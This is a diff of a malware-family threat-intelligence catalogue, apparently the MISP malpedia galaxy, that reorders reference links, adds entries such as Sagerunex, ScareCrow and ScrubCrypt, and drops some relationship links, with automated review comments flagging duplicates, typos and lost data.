- "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://0xchina.medium.com/malware-reverse-engineering-31039450af27",
- "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/CORP_KNOWLEDGEBASE/91000/KB91844/en_US/McAfee%20Labs%20Threat%20Advisory%20-%20Ransom-Ryukv6.pdf",
- "https://www.youtube.com/watch?v=HwfRxjV2wok",
- "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/"
+ "https://threatconnect.com/blog/threatconnect-research-roundup-possible-ryuk-infrastructure/",
+ "https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/"
],
"synonyms": [],
"type": []
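Review bot: roughly twenty refs leave this hunk with no `+` counterpart, and the wholesale reorder of the rest makes that easy to miss; confirm the removals are intentional upstream rather than a regeneration artifact before merging, since primary sources such as `https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-ACT-005.pdf` and `https://www.hhs.gov/sites/default/files/bazarloader.pdf` disappear while most of their neighbours are simply re-added at a new position. A deterministic sort of `refs` (or keeping the existing order) would keep future diffs reviewable, and the added `https://blog.talosintelligence.com/2020/06/CTIR-trends-q3-2020.html#more` should have its `#more` fragment stripped like the other URLs in the list.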
@@ -40405,10 +42602,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk_stealer",
- "https://www.bleepingcomputer.com/news/security/ryuk-related-malware-steals-confidential-military-financial-files/",
- "https://www.crowdstrike.com/blog/sidoh-wizard-spiders-mysterious-exfiltration-tool/",
"https://analyst1.com/file-assets/Nationstate_ransomware_with_consecutive_endnotes.pdf",
- "https://twitter.com/VK_Intel/status/1171782155581689858"
+ "https://twitter.com/VK_Intel/status/1171782155581689858",
+ "https://www.crowdstrike.com/blog/sidoh-wizard-spiders-mysterious-exfiltration-tool/",
+ "https://www.bleepingcomputer.com/news/security/ryuk-related-malware-steals-confidential-military-financial-files/"
],
"synonyms": [
"Sidoh"
@@ -40457,16 +42654,29 @@
"uuid": "d16f9dc6-290d-4174-8b47-a972cc52dac7",
"value": "SafeNet"
},
+ {
+ "description": "According to Symantec, Sagerunex is a backdoor that is fairly resilient and implements multiple forms of communication with its command-and-control (C&C) server. Its logs are encrypted and the encryption algorithm used is AES256-CBC with 8192 rounds of SHA256 for key derivation based on a hardcoded key. It supports multiple modes methods for communicating via HTTP (proxy-aware).",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sagerunex",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments-cert-authority"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d8228309-ebf8-46fd-a968-bd9e24c498b4",
+ "value": "Sagerunex"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sage_ransom",
- "https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/",
- "https://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga",
"https://www.cert.pl/en/news/single/sage-2-0-analysis/",
"http://malware-traffic-analysis.net/2017/10/13/index.html",
- "https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/"
+ "https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/",
+ "https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/",
+ "https://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga"
],
"synonyms": [
"Saga"
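Review bot: the new Sagerunex `"description"` has a doubled word, "multiple modes methods for communicating"; suggest "multiple methods of communicating via HTTP (proxy-aware)". Also confirm that the new `uuid` `d8228309-ebf8-46fd-a968-bd9e24c498b4` is not already used by another cluster in the file, since uniqueness cannot be checked from this hunk alone.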
@@ -40495,13 +42705,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.saint_bot",
- "https://cert.gov.ua/article/18419",
"https://www.cyberscoop.com/ukrainian-cyber-attacks-russia-conflict-q-and-a/",
+ "https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/",
"https://unit42.paloaltonetworks.com/atoms/nascentursa/",
"https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
- "https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/",
"https://blog.malwarebytes.com/threat-analysis/2021/04/a-deep-dive-into-saint-bot-downloader/",
- "https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/"
+ "https://cert.gov.ua/article/18419",
+ "https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/"
],
"synonyms": [],
"type": []
@@ -40515,11 +42725,13 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.saitama",
"https://x-junior.github.io/malware%20analysis/2022/06/24/Apt34.html",
+ "https://www.trendmicro.com/en_us/research/23/b/new-apt34-malware-targets-the-middle-east.html",
+ "https://isc.sans.edu/diary/Translating+Saitama%27s+DNS+tunneling+messages/28738",
"https://www.fortinet.com/blog/threat-research/please-confirm-you-received-our-apt",
- "https://blog.malwarebytes.com/threat-intelligence/2022/05/apt34-targets-jordan-government-using-new-saitama-backdoor/",
- "https://isc.sans.edu/diary/Translating+Saitama%27s+DNS+tunneling+messages/28738"
+ "https://blog.malwarebytes.com/threat-intelligence/2022/05/apt34-targets-jordan-government-using-new-saitama-backdoor/"
],
"synonyms": [
+ "AMATIAS",
"Saitama"
],
"type": []
@@ -40532,14 +42744,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sakula_rat",
+ "https://web.archive.org/web/20151001235506/https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=654",
+ "https://www.secureworks.com/research/sakula-malware-family",
"https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
"https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Sakula",
- "https://www.secureworks.com/research/sakula-malware-family",
- "https://cyberthreatintelligenceblog.wordpress.com/2018/11/16/c0ld-case-from-aerospace-to-chinas-interests/",
- "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/black-vine-cyberespionage-group-15-en.pdf",
- "https://web.archive.org/web/20151001235506/https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=654",
"https://docs.broadcom.com/doc/the-black-vine-cyberespionage-group",
+ "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/black-vine-cyberespionage-group-15-en.pdf",
"https://www.symantec.com/security_response/writeup.jsp?docid=2014-022401-3212-99",
+ "https://cyberthreatintelligenceblog.wordpress.com/2018/11/16/c0ld-case-from-aerospace-to-chinas-interests/",
"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/sakula-an-adventure-in-dll-planting/?page=1"
],
"synonyms": [
@@ -40572,15 +42784,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sality",
+ "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P18-Kleissner-Sality.pdf",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
"https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
+ "https://unit42.paloaltonetworks.com/c2-traffic/",
"https://www.mandiant.com/resources/pe-file-infecting-malware-ot",
"https://www.researchgate.net/profile/Lorenzo-De-Carli/publication/320250366_Botnet_protocol_inference_in_the_presence_of_encrypted_traffic/links/5fa9608792851cc286a08592/Botnet-protocol-inference-in-the-presence-of-encrypted-traffic.pdf?origin=publication_detail",
- "https://unit42.paloaltonetworks.com/c2-traffic/",
- "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P18-Kleissner-Sality.pdf",
+ "https://gist.githubusercontent.com/quangnh89/41deada8a936a1877a6c6c757ce73800/raw/41f27388a11a606e1d6a7596dcb6469578e79321/sality_extractor.py",
"https://www.dragos.com/blog/the-trojan-horse-malware-password-cracking-ecosystem-targeting-industrial-operators/",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf",
- "https://gist.githubusercontent.com/quangnh89/41deada8a936a1877a6c6c757ce73800/raw/41f27388a11a606e1d6a7596dcb6469578e79321/sality_extractor.py"
+ "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf"
],
"synonyms": [],
"type": []
@@ -40606,35 +42818,35 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.samsam",
- "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf",
- "https://www.justice.gov/opa/pr/two-iranian-men-indicted-deploying-ransomware-extort-hospitals-municipalities-and-public",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
- "https://nakedsecurity.sophos.com/2018/08/02/how-to-defend-yourself-against-samsam-ransomware/",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
- "https://www.secureworks.com/research/samsam-ransomware-campaigns",
"https://www.youtube.com/watch?v=LUxOcpIRxmg",
- "https://therecord.media/iranian-hackers-behind-cox-media-group-ransomware-attack/",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
- "https://news.sophos.com/en-us/2018/07/31/sophoslabs-releases-samsam-ransomware-report/",
- "https://news.sophos.com/en-us/2018/07/31/samsam-guide-to-coverage/",
- "https://www.secureworks.com/research/threat-profiles/gold-lowell",
- "https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/",
- "https://www.justice.gov/opa/press-release/file/1114746/download",
- "http://blog.talosintel.com/2016/03/samsam-ransomware.html",
+ "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf",
+ "https://nakedsecurity.sophos.com/2018/08/02/how-to-defend-yourself-against-samsam-ransomware/",
"https://www.secureworks.com/blog/samsam-converting-opportunity-into-profit",
+ "https://www.secureworks.com/research/threat-profiles/gold-lowell",
+ "https://news.sophos.com/en-us/2018/11/29/how-a-samsam-like-attack-happens-and-what-you-can-do-about-it/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
+ "https://news.sophos.com/en-us/2018/07/31/sophoslabs-releases-samsam-ransomware-report/",
+ "https://www.justice.gov/opa/pr/two-iranian-men-indicted-deploying-ransomware-extort-hospitals-municipalities-and-public",
"https://sites.temple.edu/care/ci-rw-attacks/",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
+ "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
+ "https://www.justice.gov/opa/press-release/file/1114746/download",
"https://www.secureworks.com/blog/samas-ransomware",
"https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/",
- "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
- "https://www.secureworks.com/blog/ransomware-deployed-by-adversary",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
"https://nakedsecurity.sophos.com/2018/05/01/samsam-ransomware-a-mean-old-dog-with-a-nasty-new-trick-report/",
- "https://news.sophos.com/en-us/2018/11/29/how-a-samsam-like-attack-happens-and-what-you-can-do-about-it/",
- "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://news.sophos.com/en-us/2018/07/31/samsam-guide-to-coverage/",
+ "https://www.secureworks.com/blog/ransomware-deployed-by-adversary",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
"http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html",
- "https://nakedsecurity.sophos.com/2018/07/31/samsam-the-almost-6-million-ransomware/"
+ "https://therecord.media/iranian-hackers-behind-cox-media-group-ransomware-attack/",
+ "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx",
+ "https://nakedsecurity.sophos.com/2018/07/31/samsam-the-almost-6-million-ransomware/",
+ "http://blog.talosintel.com/2016/03/samsam-ransomware.html",
+ "https://www.secureworks.com/research/samsam-ransomware-campaigns"
],
"synonyms": [
"Samas"
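Review bot: `https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1` and the same URL with a trailing slash are both removed and both re-added, so the duplicate survives the reorder; keep one form and drop the other.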
@@ -40649,8 +42861,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sanny",
- "http://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html",
- "https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html"
+ "https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html",
+ "http://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html"
],
"synonyms": [],
"type": []
@@ -40676,11 +42888,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sappycache",
- "https://blog.alyac.co.kr/2219",
- "https://blog.reversinglabs.com/blog/catching-lateral-movement-in-internal-emails",
- "https://www.fireeye.com/blog/threat-research/2019/03/winrar-zero-day-abused-in-multiple-campaigns.html",
"https://blog.alyac.co.kr/m/2219",
- "https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf"
+ "https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf",
+ "https://blog.reversinglabs.com/blog/catching-lateral-movement-in-internal-emails",
+ "https://blog.alyac.co.kr/2219",
+ "https://www.fireeye.com/blog/threat-research/2019/03/winrar-zero-day-abused-in-multiple-campaigns.html"
],
"synonyms": [],
"type": []
@@ -40693,9 +42905,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sarhust",
+ "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt",
"https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_sarhust.a",
- "https://www.fortinet.com/blog/threat-research/hussarini---targeted-cyber-attack-in-the-philippines.html",
- "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt"
+ "https://www.fortinet.com/blog/threat-research/hussarini---targeted-cyber-attack-in-the-philippines.html"
],
"synonyms": [
"ENDCMD",
@@ -40711,13 +42923,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sasfis",
- "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/sasfis",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/sasfis-malware-uses-a-new-trick/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/sasfis-fizzles-in-the-background/",
+ "https://isc.sans.edu/forums/diary/Sasfis+Propagation/8860/",
+ "https://www.symantec.com/security-center/writeup/2010-020210-5440-99",
"https://www.virusbulletin.com/virusbulletin/2012/11/tracking-2012-sasfis-campaign",
"https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Sasfis-O/detailed-analysis.aspx",
- "https://www.symantec.com/security-center/writeup/2010-020210-5440-99",
- "https://isc.sans.edu/forums/diary/Sasfis+Propagation/8860/"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/sasfis-fizzles-in-the-background/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/sasfis-malware-uses-a-new-trick/",
+ "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/sasfis"
],
"synonyms": [
"Oficla"
@@ -40732,14 +42944,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.satan",
- "https://www.sangfor.com/source/blog-network-security/1094.html",
+ "https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread",
"http://blog.nsfocusglobal.com/categories/trend-analysis/satan-variant-analysis-handling-guide/",
- "https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html",
"https://www.bleepingcomputer.com/news/security/dbger-ransomware-uses-eternalblue-and-mimikatz-to-spread-across-networks/",
"https://bartblaze.blogspot.com/2020/01/satan-ransomware-rebrands-as-5ss5c.html",
+ "https://cyware.com/news/new-satan-ransomware-variant-lucky-exposes-10-server-side-vulnerabilities-070afbd2",
"https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/",
- "https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread",
- "https://cyware.com/news/new-satan-ransomware-variant-lucky-exposes-10-server-side-vulnerabilities-070afbd2"
+ "https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html",
+ "https://www.sangfor.com/source/blog-network-security/1094.html"
],
"synonyms": [
"5ss5c",
@@ -40756,8 +42968,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.satana",
- "https://blog.reversinglabs.com/blog/retread-ransomware",
- "https://www.cylance.com/threat-spotlight-satan-raas"
+ "https://www.cylance.com/threat-spotlight-satan-raas",
+ "https://blog.reversinglabs.com/blog/retread-ransomware"
],
"synonyms": [],
"type": []
@@ -40770,7 +42982,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.satellite_turla",
- "https://securelist.com/satellite-turla-apt-command-and-control-in-the-sky/72081/"
+ "https://securelist.com/satellite-turla-apt-command-and-control-in-the-sky/72081/",
+ "https://nsarchive.gwu.edu/sites/default/files/documents/3921357/Government-of-Canada-Hackers-are-Humans-Too.pdf"
],
"synonyms": [],
"type": []
@@ -40789,15 +43002,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "35849d8f-5bac-475b-82f8-7d555f37de12",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "bdc7cc9c-c46d-4f77-b903-2335cc1a3369",
"value": "Sathurbot"
},
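Review bot: the removed `related` block drops the `similar` link from Sathurbot to dest-uuid `35849d8f-5bac-475b-82f8-7d555f37de12` without a replacement, so any correlation MISP built from that relationship disappears on update. If the regeneration intentionally stops emitting `related` entries for the malpedia galaxy, state that in the commit message; if not, the relationship data needs to be carried over.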
@@ -40806,9 +43010,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.scanpos",
+ "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2016-11-15-scanpos.md",
"https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware",
- "https://securitykitten.github.io/2016/11/15/scanpos.html",
- "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2016-11-15-scanpos.md"
+ "https://securitykitten.github.io/2016/11/15/scanpos.html"
],
"synonyms": [],
"type": []
@@ -40838,10 +43042,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.scarab_ransom",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/",
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
"http://malware-traffic-analysis.net/2017/11/23/index.html",
- "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/"
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf"
],
"synonyms": [],
"type": []
@@ -40849,13 +43053,26 @@
"uuid": "c1ccba65-e2f0-4f29-8e04-6b119c7f8694",
"value": "Scarab Ransomware"
},
+ {
+ "description": "Based on the leaked Conti source code.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scarecrow",
+ "https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-vohuk-scarecrow-and-aerst-variants"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "7e8e41de-b3f8-4c2b-a9fe-e1aa6532e76b",
+ "value": "ScareCrow"
+ },
{
"description": "Schneiken is a VBS 'Double-dropper'. It comes with two RATs embedded in the code (Dunihi and Ratty). Entire code is Base64 encoded.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.schneiken",
- "https://engineering.salesforce.com/malware-analysis-new-trojan-double-dropper-5ed0a943adb",
- "https://github.com/vithakur/schneiken"
+ "https://github.com/vithakur/schneiken",
+ "https://engineering.salesforce.com/malware-analysis-new-trojan-double-dropper-5ed0a943adb"
],
"synonyms": [],
"type": []
@@ -40868,23 +43085,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.scieron",
- "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
"https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=8bfa7311-fdd9-4f8d-b813-1ab6c9d2c363",
+ "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
"https://www.sentinelone.com/labs/chinese-threat-actor-scarab-targeting-ukraine",
"https://www.sentinelone.com/labs/chinese-threat-actor-scarab-targeting-ukraine/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "267bf78e-f430-47b6-8ba0-1ae31698c711",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "e343583b-8338-42ea-af60-311578146151",
"value": "Scieron"
},
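Review bot: the two sentinelone refs that remain in this list (`.../chinese-threat-actor-scarab-targeting-ukraine` with and without the trailing slash) are the same article and should be deduplicated, ideally by normalizing URLs before comparison in the generator. This hunk also silently removes the `related` link to `267bf78e-f430-47b6-8ba0-1ae31698c711`.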
@@ -40906,24 +43114,28 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.scranos",
- "https://www.bitdefender.com/files/News/CaseStudies/study/271/Bitdefender-Whitepaper-Scranos-2.pdf",
- "https://labs.bitdefender.com/2019/04/inside-scranos-a-cross-platform-rootkit-enabled-spyware-operation/"
+ "https://labs.bitdefender.com/2019/04/inside-scranos-a-cross-platform-rootkit-enabled-spyware-operation/",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/271/Bitdefender-Whitepaper-Scranos-2.pdf"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "5f0f6af2-b644-49a6-8f68-5d4ca58c989e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "b5d90140-f307-402c-9d7f-9cdf21a7cb31",
"value": "Scranos"
},
+ {
+ "description": "SentinelOne describes this malware as capable of doing screen capture and keylogging. It is uses by a threat cluster they named WIP19, targeting telecommunications and IT service providers in the Middle East and Asia.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.screencap",
+ "https://www.sentinelone.com/labs/wip19-espionage-new-chinese-apt-targets-it-service-providers-and-telcos-with-signed-malware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cba2db46-268c-4203-a982-3bf9985c91a4",
+ "value": "ScreenCap"
+ },
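Review bot: typo in the new ScreenCap description: `It is uses by a threat cluster` should read `It is used by a threat cluster`. The hunk also drops Scranos's `related` link to `5f0f6af2-b644-49a6-8f68-5d4ca58c989e`, which should be confirmed as intended.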
{
"description": "",
"meta": {
@@ -40937,33 +43149,48 @@
"uuid": "9803b201-28e5-40c5-b661-c1a191388072",
"value": "ScreenLocker"
},
+ {
+ "description": "ScrubCrypt is the rebranded \"Jlaive\" crypter, with a unique capability of .BAT packing",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scrubcrypter",
+ "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/scrubcrypt-the-rebirth-of-jlaive",
+ "https://perception-point.io/blog/the-rebranded-crypter-scrubcrypt/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "6f597339-7eac-4885-b888-bf8a81bca7b3",
+ "value": "ScrubCrypt"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sdbbot",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104",
+ "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
+ "https://vblocalhost.com/uploads/VB2020-Jung.pdf",
+ "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://www.cyber.gov.au/acsc/view-all-content/alerts/sdbbot-targeting-health-sector",
+ "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
"https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
"https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://intel471.com/blog/a-brief-history-of-ta505",
- "https://vblocalhost.com/uploads/VB2020-Jung.pdf",
- "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
- "https://github.com/Tera0017/SDBbot-Unpacker",
- "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://www.secureworks.com/research/threat-profiles/gold-tahoe",
- "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/",
- "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
- "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.96_ENG.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
"https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
- "https://www.cyber.gov.au/acsc/view-all-content/alerts/sdbbot-targeting-health-sector"
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.secureworks.com/research/threat-profiles/gold-tahoe",
+ "https://github.com/Tera0017/SDBbot-Unpacker",
+ "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "https://intel471.com/blog/a-brief-history-of-ta505",
+ "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.96_ENG.pdf",
+ "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader"
],
"synonyms": [],
"type": []
@@ -40972,14 +43199,14 @@
"value": "SDBbot"
},
{
- "description": "",
+ "description": "Backdoor written in Python 2, deployed with PyInstaller.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.seadaddy",
